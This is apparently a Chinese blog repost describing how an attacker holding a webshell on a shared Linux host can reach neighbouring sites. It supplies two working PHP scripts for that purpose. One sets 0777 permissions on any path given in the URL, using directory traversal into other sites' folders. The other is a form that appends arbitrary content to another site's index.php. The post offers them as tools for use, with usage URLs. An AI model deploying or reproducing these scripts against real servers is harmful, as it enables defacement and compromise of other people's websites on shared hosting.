当前位置: 首页 > news >正文

linux下用webshell修改文件权限

news 来源:原创 2024/5/3 14:35:03

当我们拥有了一个linux下的shell(服务器上多个网站)。
这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。
那么,这样的主机设置肯定是不安全的。
有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。
我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。
代码:

<?php
$path = stripslashes($_GET[&apos;path&apos;]);
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>
保存为chmod.PHP
使用方法简单,访问

http://www.heimian.com/chmod.php?path=../../其他站点的目录/index.php

这里的index.PHP是要修改权限的文件。
另外一个exploit:
把下面的代码保存为exploit.PHP
代码:

<?php
@$filename = stripslashes($_POST[&apos;filename&apos;]);
@$mess = stripslashes($_POST[&apos;mess&apos;]);
$fp = @fopen({$_POST[&apos;filename&apos;]}, &apos;a&apos;);
@fputs($fp,$mess <hr size=1 color=black>);
@fclose($fp);
?>
<form name=form1 action=exploit.php method=post>
<p align=center><b>
<br>
CODE :<br>
<textarea name=mess rows=3></textarea></font></b></textarea>
</font></b> <p><input type=hidden name=filename value=../../AUTRE WEBSITE SUR LE MULTIHOSTING/index.php></p>
<center>
<input type=reset name=Submit value=Delete>
<input name=go type=submit value=Send onClick=javascript:this.style.visibility =&apos;hidden&apos;;>
<center>
</form>
<meta http-equiv=Content-Type content=text/html; charset=iso-8859-1>
<title>Changing CHMOD Permissions Exploit – Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title>
</head>
<body>
</center>
</body>

相关文章:

  • ASP .NET PHP 注入页面构造
  • 黑盒白盒测试工具
  • 反弹先锋Win32.ConnectBackShell
  • 变形aspwebshell phpwebshell[Lcx]
  • Serv-U BlackDoor [Version:6.4.x]
  • discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来
  • 菲律宾 IT安全网被黑
  • freetextbox最新上传0day
  • 不改文件名的情况下上传突破
  • Mssql Public权限列目录
  • Ecshop 漏洞集合
  • DEDEcms GET shell 再次通杀 所有版本
  • N点主机管理系统密码解密代码程序
  • PHP168 V6.01/6.02权限提升及暴本地路径漏洞
  • 手工注入大全学习手册
  • 9月CHINA-PUB-OPENDAY技术沙龙——IPHONE
  • @jsonView过滤属性
  • 【跃迁之路】【519天】程序员高效学习方法论探索系列(实验阶段276-2018.07.09)...
  • 230. Kth Smallest Element in a BST
  • iOS | NSProxy
  • iOS编译提示和导航提示
  • JavaScript创建对象的四种方式
  • Java的Interrupt与线程中断
  • React Transition Group -- Transition 组件
  • 检测对象或数组
  • 蓝海存储开关机注意事项总结
  • 前端之Sass/Scss实战笔记
  • 人脸识别最新开发经验demo
  • 首页查询功能的一次实现过程
  • 思否第一天
  • 资深实践篇 | 基于Kubernetes 1.61的Kubernetes Scheduler 调度详解 ...
  • ​configparser --- 配置文件解析器​
  • ​flutter 代码混淆
  • ​人工智能书单(数学基础篇)
  • # Panda3d 碰撞检测系统介绍
  • #FPGA(基础知识)
  • $(function(){})与(function($){....})(jQuery)的区别
  • ()、[]、{}、(())、[[]]等各种括号的使用
  • (02)Hive SQL编译成MapReduce任务的过程
  • (react踩过的坑)Antd Select(设置了labelInValue)在FormItem中initialValue的问题
  • (二)换源+apt-get基础配置+搜狗拼音
  • (附源码)spring boot公选课在线选课系统 毕业设计 142011
  • (附源码)ssm教材管理系统 毕业设计 011229
  • (一)RocketMQ初步认识
  • (已解决)报错:Could not load the Qt platform plugin “xcb“
  • (转)Windows2003安全设置/维护
  • .net 4.0 A potentially dangerous Request.Form value was detected from the client 的解决方案
  • .Net IOC框架入门之一 Unity
  • .NET 的静态构造函数是否线程安全?答案是肯定的!
  • .NET 命令行参数包含应用程序路径吗?
  • .NET 同步与异步 之 原子操作和自旋锁(Interlocked、SpinLock)(九)
  • .NET 依赖注入和配置系统
  • .NET使用HttpClient以multipart/form-data形式post上传文件及其相关参数
  • .Net中的设计模式——Factory Method模式
  • /bin/rm: 参数列表过长"的解决办法